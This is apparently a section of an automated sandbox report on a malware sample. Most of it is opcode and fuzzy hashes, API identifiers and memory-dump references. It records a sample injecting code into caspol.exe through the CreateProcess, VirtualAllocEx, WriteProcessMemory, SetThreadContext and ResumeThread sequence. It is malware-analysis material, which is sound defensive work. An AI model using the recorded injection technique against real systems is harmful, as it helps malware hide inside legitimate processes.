                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wmemset$ErrorLast
                                                                      • String ID: IDA$IDA
                                                                      • API String ID: 887189805-2020647798
                                                                      • Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                                                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                                      • Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                                                                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                                                      APIs
                                                                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                                      • socket.WS2_32(?,?,?), ref: 00404E7A
                                                                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: freeaddrinfogetaddrinfosocket
                                                                      • String ID:
                                                                      • API String ID: 2479546573-0
                                                                      • Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                                                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                                      • Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                                                                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000003.505249863.00000000030B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_3_30b0000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                      • Instruction ID: 5529fca36150f31da0b986077cb1f13732b68b0e978173cbfe1c7568bdb5f22f
                                                                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                      • Instruction Fuzzy Hash:

                                                                      Execution Graph

                                                                      Execution Coverage: 14.7%
                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 129
                                                                      Total number of Limit Nodes: 13

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0037E597
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: gN$gN$gN
                                                                      • API String ID: 963392458-2543736959
                                                                      • Opcode ID: 7340ad8349140dca72ee077835dbc1cd1a86f1b5c6dfe12e5f48d50428e587bd
                                                                      • Instruction ID: 1fce7c5e78c38c766875fbe3c099de25f3e2a5aafe4a46a0d83c6f6ed4a10088
                                                                      • Opcode Fuzzy Hash: 7340ad8349140dca72ee077835dbc1cd1a86f1b5c6dfe12e5f48d50428e587bd
                                                                      • Instruction Fuzzy Hash: 27C14770D002598FDF25CFA8C845BEEBBB1BF09304F0091AAD819B7254DB789A85CF95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0037E597
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: gN$gN$gN
                                                                      • API String ID: 963392458-2543736959
                                                                      • Opcode ID: 19a27bbef4a6516bb4b9b61fdc371914c98bc3673b864dd395d3aba39e73a763
                                                                      • Instruction ID: a43b1304ed6d9703e6fe1e062888ccd8ac10c07ec38ae44378ba0e8a8434435b
                                                                      • Opcode Fuzzy Hash: 19a27bbef4a6516bb4b9b61fdc371914c98bc3673b864dd395d3aba39e73a763
                                                                      • Instruction Fuzzy Hash: 9FC13670D002198FDF25CFA8C845BEEBBB1BF09304F0091AAD819B7250DB789A85CF95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037E00B
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 5df8f024a19a4cc1f66095f5ef32dee981a0092e12224152709b6abd5298b06a
                                                                      • Instruction ID: bd5215d548fd8327cf45d0287e13c7ffc7f17ca7364767920e4ce3ab684fc9ca
                                                                      • Opcode Fuzzy Hash: 5df8f024a19a4cc1f66095f5ef32dee981a0092e12224152709b6abd5298b06a
                                                                      • Instruction Fuzzy Hash: 8841BDB4D012489FCF10CFA9D984AEEFBF1BB49314F20902AE814B7210D379AA45CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037E00B
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: c45f0c73637aea90f294451dfede54661fecdb7ca4d6e1a7cf351051d75c777c
                                                                      • Instruction ID: 0e248cf0d9a0b7ce6b2c4698792f77e334393f423fd9fe16544d9b645453c2d9
                                                                      • Opcode Fuzzy Hash: c45f0c73637aea90f294451dfede54661fecdb7ca4d6e1a7cf351051d75c777c
                                                                      • Instruction Fuzzy Hash: EA41ADB4D012589FCF10CFA9D984AEEFBF1BB49314F20902AE815B7210D375AA45CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037E14A
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: f770f2b7ca2bc3529e1d6e1dedd8928cf06dc418e857256e7e7fe1fd56fe8f53
                                                                      • Instruction ID: 4df0fda947ae09c64e6dbef7794f83acff34be1c165b42dfd35fecd5a4053d59
                                                                      • Opcode Fuzzy Hash: f770f2b7ca2bc3529e1d6e1dedd8928cf06dc418e857256e7e7fe1fd56fe8f53
                                                                      • Instruction Fuzzy Hash: DB41CBB8D042589FCF10CFA9D984AEEFBB1BF49310F24906AE815B7210C378A945CF64

                                                                      Control-flow Graph (nodes and edges, from the interactive graph view)
                                                                      • control_flow_graph 853 37e098-37e160 ReadProcessMemory 856 37e162-37e168 853->856 857 37e169-37e1bb 853->857 856->857
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037E14A
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 94d462935bd0d36c6a6f9ddbf07140bf3782914eea61e311cf4c99dea2fb4834
                                                                      • Instruction ID: 9ea3bd2ed21f33ee96cb3b05477d900e260afcf67cc6dfaeb926d9cd1a563e7e
                                                                      • Opcode Fuzzy Hash: 94d462935bd0d36c6a6f9ddbf07140bf3782914eea61e311cf4c99dea2fb4834
                                                                      • Instruction Fuzzy Hash: 4041AAB9D002589FCF10CFA9D984AEEFBB1BF49314F14942AE815B7210D735A945CF64

                                                                      Control-flow Graph (nodes and edges, from the interactive graph view)
                                                                      • control_flow_graph 862 37de0c-37ded0 VirtualAllocEx 865 37ded2-37ded8 862->865 866 37ded9-37df23 862->866 865->866
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0037DEBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 1590a7e1511dd2f78fbb1e38cd364384efc9a248a2a400a967009652c6078f8e
                                                                      • Instruction ID: b540b688a65872850037fbd7cfe2a611ce13a07a4b1c217b3e4aee326c3a91a9
                                                                      • Opcode Fuzzy Hash: 1590a7e1511dd2f78fbb1e38cd364384efc9a248a2a400a967009652c6078f8e
                                                                      • Instruction Fuzzy Hash: CB41A8B8D002589FCF10CFA9D984AEEFBB1AF49314F20942AE815BB214D735A945CF64

                                                                      Control-flow Graph (nodes and edges, from the interactive graph view)
                                                                      • control_flow_graph 871 37de10-37ded0 VirtualAllocEx 874 37ded2-37ded8 871->874 875 37ded9-37df23 871->875 874->875
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0037DEBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 5c5d0958e7d76efb7bd86933dc7ff8780a9ae96ec6b28c82210f24c1efa4febf
                                                                      • Instruction ID: 9209c07ca428be955e63aa14cd751960206533992f53dd17643b16306aefb7c5
                                                                      • Opcode Fuzzy Hash: 5c5d0958e7d76efb7bd86933dc7ff8780a9ae96ec6b28c82210f24c1efa4febf
                                                                      • Instruction Fuzzy Hash: D9419AB8D002589BCF10CFA9D984AAEFBB1BF49314F10941AE815B7314D735A945CF55

                                                                      Control-flow Graph (nodes and edges, from the interactive graph view)
                                                                      • control_flow_graph 880 37d8a1-37d908 882 37d91f-37d96d Wow64SetThreadContext 880->882 883 37d90a-37d91c 880->883 885 37d976-37d9c2 882->885 886 37d96f-37d975 882->886 883->882 886->885
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0037D957
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 79d6a39056b48f81709e3d64a4473c82211d5ced38894f7bb8e99b0e624375b9
                                                                      • Instruction ID: 5d906e84a0e7ecd135592424afc6833f41fe14ebaad99b87d4bda6f8a6a5f8e9
                                                                      • Opcode Fuzzy Hash: 79d6a39056b48f81709e3d64a4473c82211d5ced38894f7bb8e99b0e624375b9
                                                                      • Instruction Fuzzy Hash: FE41CEB5D002589FCB10CFA9D884AEEFBF1AF49314F24802AE419B7244C3389A49CF54
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0037D957
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 2fcc243a0e91ad37bd9f822c439b2d34d4e3f60e4f0930e287f5d769af200f5f
                                                                      • Instruction ID: f11879d5d32c26567ebbb2f74bf84ad4a928d2048f5f7aa309b4d244462efc2a
                                                                      • Opcode Fuzzy Hash: 2fcc243a0e91ad37bd9f822c439b2d34d4e3f60e4f0930e287f5d769af200f5f
                                                                      • Instruction Fuzzy Hash: 6B41ACB5D002589FCB10CFA9D884AEEFBF1AF49314F24802AE519B7244D738A949CF54
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 0037D836
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: d5fde5beef2a19a51853e09d52f7d4bbba66cfab1547e7458b97379b83dd725c
                                                                      • Instruction ID: 2aefdafe1464fc7c3ac7f1c905be2822a0d580f1e2331c8fbd51e504c95a155c
                                                                      • Opcode Fuzzy Hash: d5fde5beef2a19a51853e09d52f7d4bbba66cfab1547e7458b97379b83dd725c
                                                                      • Instruction Fuzzy Hash: 2F31ABB5D002189FCF14CFA9D984AAEFBB5AF49314F14942AE819B7200D735A906CF95
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 0037D836
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532321381.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_370000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 162064fa0f39eb9157af18e3c49150fac239011b8debb00f1fbbe1007ff6078b
                                                                      • Instruction ID: 4d2e6fb46f868c0ce35390af247ff8222bd956adae101cb7956631598e8ef24b
                                                                      • Opcode Fuzzy Hash: 162064fa0f39eb9157af18e3c49150fac239011b8debb00f1fbbe1007ff6078b
                                                                      • Instruction Fuzzy Hash: 2531BAB4D00218AFCF14CFA9D984AAEFBB5AF49314F24942AE819B7300C735A905CF95
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gN
                                                                      • API String ID: 0-1609106795
                                                                      • Opcode ID: 32bb58f9918f9f605a1a560908d653be6c3b9e4181263fb3112e58e5268b6904
                                                                      • Instruction ID: ed4783089930a8b813d198629a4970b4ce2cc10b10cec491da38bbcbfd1e4aca
                                                                      • Opcode Fuzzy Hash: 32bb58f9918f9f605a1a560908d653be6c3b9e4181263fb3112e58e5268b6904
                                                                      • Instruction Fuzzy Hash: 3C412C75E45219CFDB64CF64CC807E8B7B5BF99300F2096EAD509A6241EB745AC4DF80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (
                                                                      • API String ID: 0-3887548279
                                                                      • Opcode ID: 92fb8925b0ca80c0978b1c8855d66d0af7dcd80e55fb44d8b4689133f552d24a
                                                                      • Instruction ID: 31afa69201363345764b3814cbdbd22005bc8c9dde5a00b5220dc965c65f08c3
                                                                      • Opcode Fuzzy Hash: 92fb8925b0ca80c0978b1c8855d66d0af7dcd80e55fb44d8b4689133f552d24a
                                                                      • Instruction Fuzzy Hash: BA01EF3590A228CFEB60CF64C884FE8BBB5AB09304F949199D40DA3252C7359E86CF00
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7d2f0de1779060e6059cb6eaa5bdae13aadf84809e124661b26585c886f400d
                                                                      • Instruction ID: c13f8f1918b7f890bff774da892e9b2f6c88c12ec71d60ce510fd44284538393
                                                                      • Opcode Fuzzy Hash: a7d2f0de1779060e6059cb6eaa5bdae13aadf84809e124661b26585c886f400d
                                                                      • Instruction Fuzzy Hash: 49413E74909218CFEB64CF54C954BE8B7B9FB4A311F5490EA840EA3292C7399EC5DF00
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532221927.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_17d000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: beb76c4d60702b41a609ea54fc4035f76556518fbf36b79c98eb8887dfabdd98
                                                                      • Instruction ID: 46e9946be57261d5209dbc6b84a9c910d9bf55ea884654932b9c3cc7d8bb4c1b
                                                                      • Opcode Fuzzy Hash: beb76c4d60702b41a609ea54fc4035f76556518fbf36b79c98eb8887dfabdd98
                                                                      • Instruction Fuzzy Hash: 3521B0B5604248AFDB15DF14E9C0B26BBB5EF84314F24C5A9E8494B256C336D847CB61
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532221927.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_17d000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 659ad353138d2fc52e4a4cdc4f3cdf7cedde829496efcee78784a3866059a938
                                                                      • Instruction ID: d164b459a808e4dc30d8f9d11a3c02c5438a412f86134e511d9242d1057f6da0
                                                                      • Opcode Fuzzy Hash: 659ad353138d2fc52e4a4cdc4f3cdf7cedde829496efcee78784a3866059a938
                                                                      • Instruction Fuzzy Hash: B321D075604248EFDB15CF14E884B26BB71EF84314F34C5A9E84D4B246C336D847CBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cda0344fd149f7bbb8440f82a63d505c30f548456d80cafa9b86c1929f1697e1
                                                                      • Instruction ID: 468777e6324c63455aafd155cbf03590b423cf98bc2ce6791c608de7bd2e7096
                                                                      • Opcode Fuzzy Hash: cda0344fd149f7bbb8440f82a63d505c30f548456d80cafa9b86c1929f1697e1
                                                                      • Instruction Fuzzy Hash: BD21E374E49218CFDB60CF64D890BECBBB6BB49314F6091A9D40DA7256CB355E82DF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532221927.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_17d000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 565f75d38e4f7350f063d62ce24505424e1b395d29b5c826c31e1f917094453a
                                                                      • Instruction ID: ce486fcf9abe6ec95ceb8dbf38f3db559b2253b8cea6385595494ee791a13ebc
                                                                      • Opcode Fuzzy Hash: 565f75d38e4f7350f063d62ce24505424e1b395d29b5c826c31e1f917094453a
                                                                      • Instruction Fuzzy Hash: 92218B755093848FDB12CF24D994B15BF71EF46314F28C5EAD8498F2A7C33A984ACB62
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 99b7f4555b8ba8bebaa4cbd5e29d468732363d2457fbb1c238c7747f47daa957
                                                                      • Instruction ID: 61dc07d80988b0491f657400845364f2d63d4d49830321ed1cc3bb80fd52a1ec
                                                                      • Opcode Fuzzy Hash: 99b7f4555b8ba8bebaa4cbd5e29d468732363d2457fbb1c238c7747f47daa957
                                                                      • Instruction Fuzzy Hash: B2114C75A45218DFEB60CF54CD84BECB7B8AB19300F6490EAD54EA7282CBB45AC5CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532221927.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_17d000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                      • Instruction ID: 0041194c1817ab7fc62789af46a91491cb852afa837990730b6338af1206f0ea
                                                                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                      • Instruction Fuzzy Hash: 3F117975944284DFDB12CF14D5C4B15BBB1FF84314F28C6A9D8494B656C33AD84ACBA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e58783f97257f94e337031d7707191c5982f4578f850bbc889443d73f46eebaa
                                                                      • Instruction ID: 9beaa8314d99558c961735a3ed7e4c27c4c710cf6bd6c80574af19cfc2a1c92d
                                                                      • Opcode Fuzzy Hash: e58783f97257f94e337031d7707191c5982f4578f850bbc889443d73f46eebaa
                                                                      • Instruction Fuzzy Hash: 4311F3B8D04249DFCB44DFA9D5956BEBBF5BB89300F2090AAC819A3346E7345B41CF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dae1f512f55cdbfec2bc2c706d1ddb4c96b2da483c38be33de5559d42c4d3e4e
                                                                      • Instruction ID: 57d08ce45db6b6880cf21118371571b909eece099a0aab619c4501614df968e5
                                                                      • Opcode Fuzzy Hash: dae1f512f55cdbfec2bc2c706d1ddb4c96b2da483c38be33de5559d42c4d3e4e
                                                                      • Instruction Fuzzy Hash: 51112975A44218DFEB60CF54CC80BECB7B8AB19300F6490DAE54DA7282C7B49AC5CF50
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c5a3dd009390f91568dfaf2f1bb8e4a8825313c1b95f5b0fefb6c2f155ccc3e7
                                                                      • Instruction ID: 6852a53db2bab5922f82051f2349b4e13054bfde4a024499911a52d21a5c79f4
                                                                      • Opcode Fuzzy Hash: c5a3dd009390f91568dfaf2f1bb8e4a8825313c1b95f5b0fefb6c2f155ccc3e7
                                                                      • Instruction Fuzzy Hash: 94112A74908218CFDB60DF64C895BECBBB4AB09311F1449D9D00DAB292C7388EC5CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 51f5ff024b9827ff4311d741a9f22717ebb63b5ca48abceb0efb476e44169b9a
                                                                      • Instruction ID: 5e17fbaa6cf005ae49d16c3de7bfd3361183e8256ad92a449d280f941903f857
                                                                      • Opcode Fuzzy Hash: 51f5ff024b9827ff4311d741a9f22717ebb63b5ca48abceb0efb476e44169b9a
                                                                      • Instruction Fuzzy Hash: 7A014F75A44218DFEB60CF50CC81BECB7B8AB19300F2480D5E50DAB282C7745AC5CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_730000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3484fefc7b24e21066ad395bbde3d041341eb80a607cfc7e1cd9fbbff9cf5f97
                                                                      • Instruction ID: caf46d6ec04e4613fccfe94200ac760dbc686aac671b0ca197808c73bdf378f4
                                                                      • Opcode Fuzzy Hash: 3484fefc7b24e21066ad395bbde3d041341eb80a607cfc7e1cd9fbbff9cf5f97
                                                                      • Instruction Fuzzy Hash: 61014C74E092548FDB51CF68CC94ADDBBB1FF49304F2440EAD909AB252C7325A41CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.532817167.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
